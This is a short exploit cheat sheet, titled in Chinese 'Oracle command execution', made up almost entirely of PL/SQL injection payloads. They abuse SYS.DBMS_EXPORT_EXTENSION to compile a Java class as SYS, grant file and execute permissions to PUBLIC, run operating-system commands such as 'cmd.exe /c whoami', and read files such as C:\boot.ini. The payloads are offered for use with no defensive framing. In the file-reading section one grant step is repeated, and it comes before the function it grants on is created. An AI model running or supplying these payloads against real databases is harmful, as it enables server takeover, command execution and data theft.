ORACLE执行命令

http://notsosecure.com/folder2/ora_cmd_exec.txt

1. select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 
''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named 
"LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) 
{try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() 
) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str %2b=stemp%2b"\n";myReader.close();return 
str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader 
myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != 
null) str %2b=stemp%2b"\n";myReader.close();return str;} catch (Exception e){return 
e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) from dual
2. select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 
''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( 
''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<>'''''''', ''''''''execute'''''''' 
);end;'''';END;'';END;--','SYS',0,'1',0) from dual
3. select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 
''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function LinxRunCMD(p_cmd in 
varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; 
'''';END;'';END;--','SYS',0,'1',0) from dual
4. select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 
''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to 
public'''';END;'';END;--','SYS',0,'1',0) from dual
5. select sys.LinxRunCMD('cmd.exe /c whoami') from dual

----------
Reading Files

1. select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 
''DECLARE 
PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "LinxUtil" as 
import java.io.*;import java.net.URL; public class LinxUtil extends Object {public static String runCMD(String args) 
{try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() 
) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str %2b=stemp%2b"\n";myReader.close();return 
str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader 
myReader= new BufferedReader(filename.startsWith("http")?new InputStreamReader(new URL(filename).openStream()):new 
FileReader(filename));String stemp,str="";while ((stemp = myReader.readLine()) != null) str 
%2b=stemp%2b"\n";myReader.close();return str;} catch (Exception e){return 
e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) from dual
2. select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 
''DECLARE 
PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to 
public'''';END;'';END;--','SYS',0,'1',0) from dual
3. select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 
''DECLARE 
PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function LinxReadFile(filename in varchar2) 
return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; 
'''';END;'';END;--','SYS',0,'1',0) from dual
4. select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 
''DECLARE 
PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to 
public'''';END;'';END;--','SYS',0,'1',0) from dual
5. select sys.LinxReadFile('C:\boot.ini') from dual;